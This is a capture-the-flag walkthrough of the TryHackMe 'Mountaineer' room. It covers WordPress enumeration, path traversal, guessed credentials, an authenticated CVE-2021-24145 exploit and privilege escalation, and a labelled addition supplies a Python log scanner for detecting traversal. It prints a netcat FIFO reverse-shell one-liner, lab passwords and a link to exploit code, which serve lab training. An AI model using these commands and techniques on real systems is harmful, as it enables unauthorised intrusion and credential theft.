
TryHackMe Mountaineer


The Mountaineer room on TryHackMe is a beginner-friendly CTF challenge that focuses on Linux enumeration and privilege escalation. The task involves discovering hidden files, exploring SSH access, and exploiting common misconfigurations or weak permissions to gain elevated privileges on the system. This room is great for reinforcing fundamental skills in Linux privilege escalation and system enumeration.


For initial recon I used rustscan with the -sCV flag.

Port 22 (SSH): Running OpenSSH 8.9p1 on Ubuntu

Port 80 (HTTP): Running nginx 1.18.0 on Ubuntu

To gather more detailed information, I followed up with an Nmap scan on the detected ports, which provided additional details:

The SSH server uses ECDSA and ED25519 host keys. The HTTP service is running nginx, supporting basic methods like GET and HEAD. The default nginx welcome page was displayed, suggesting no specific web application was immediately accessible.

I ran a ffuf scan and found a wordpress directory.

This is the WordPress website. In the meantime I used ffuf to enumerate more directories.

We can see a domain name here, so add it to /etc/hosts.


This is the website.

Use wpscan for more info.

We can see a theme is installed in it. I tried to exploit it, but it didn't work.

We also got some usernames:

ChoOyu Everest MontBlanc admin everest montblanc chooyu k2

Save them into a text file.

We can see an image directory; capture the request.

We can see a potential path traversal here.

I used ChatGPT to find the nginx file locations from which we can get some info.

This is the interesting location that I found.

We can see a vhost name there; add it to the /etc/hosts file.
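As an added defender-side example that is not part of this writeup: a small Python script that scans nginx access-log lines for the kind of path traversal used above. It percent-decodes repeatedly (so double encoding is caught), checks both the URL path and every query value, collapses the dot segments to see which file was targeted, and flags requests that resolved to a sensitive location with a 200. The log lines are constructed, not taken from the room.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample nginx access-log lines (not taken from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2024:12:00:01 +0000] "GET /wordpress/wp-content/uploads/a.jpg HTTP/1.1" 200 5120
10.0.0.9 - - [10/Jun/2024:12:00:07 +0000] "GET /images/../../../../etc/nginx/sites-enabled/default HTTP/1.1" 200 812
10.0.0.9 - - [10/Jun/2024:12:00:09 +0000] "GET /images/%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 153
10.0.0.9 - - [10/Jun/2024:12:00:12 +0000] "GET /images/..%252f..%252fetc/hosts HTTP/1.1" 200 90
10.0.0.9 - - [10/Jun/2024:12:00:15 +0000] "GET /images/?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1800
"""
# Combined-format access line: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Locations an image handler has no business serving from.
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/root/", "/home/", "/var/log/")

def decode_fully(text, rounds=3):
    # Percent-decode repeatedly so double-encoded ..%252f is caught as well.
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text.replace("\\", "/")

def classify(raw_target, status):
    # Return (verdict, resolved_path) for a traversal attempt, else None.
    path, _, query = raw_target.partition("?")
    # Check the URL path and every query value: file-serving parameters such
    # as ?file=../../etc/passwd are the classic carrier for traversal.
    cands = [path] + [kv.partition("=")[2] for kv in query.split("&")]
    for cand in map(decode_fully, cands):
        if "../" not in cand + "/":
            continue
        target = posixpath.normpath("/" + cand.lstrip("/"))  # collapse dots
        if status == 200 and target.startswith(SENSITIVE_PREFIXES):
            return ("likely-successful-read", target)
        return ("traversal-attempt", target)
    return None

def scan_log(text):
    # Return (ip, verdict, resolved_path) for every suspicious request.
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (verdict := classify(m["target"], int(m["status"]))):
            hits.append((m["ip"], *verdict))
    return hits
```

Calling scan_log(SAMPLE_LOG) flags four of the five lines, three of them as likely successful reads of files under /etc/, which is the signal to alert on and to check the image handler's path validation.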


It's a login page that requires creds, so I tried SQL injection and other login bypass methods. Nothing worked, so I used the usernames we got from wpscan to get in.

k2:k2

is the username and password.



I got a password:

th3_tall3st_password_in_th3_world

And another interesting mail.

We already have a username and password, so I used them against wp-admin:

k2:th3_tall3st_password_in_th3_world

It worked.

Once we have authentication, we can use the exploit for CVE-2021-24145:

https://github.com/Hacker5preme/Exploits/tree/main/Wordpress/CVE-2021-24145

We can download it from here.

And exploit it.

We got a shell.


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ip port >/tmp/f

I used this to get the reverse shell.


We can see a backup file here; get it onto my system and analyse it.

The http.server method didn't work, so I used the nc method to transfer the file.


I used john to crack the password


But rockyou isn't working for me and it's taking too much time, so I created a custom wordlist to crack it.

We can use tools like crunch, cewl, or cupp to do this.

I used cupp, because this format looks similar to the cupp one.

We got our custom wordlist.


The password is cracked.


Basic Commands



We got a username and password; it's probably for SSH.


Login using SSH.

We can directly get the root password from the bash history.


This post is licensed under CC BY 4.0 by the author.
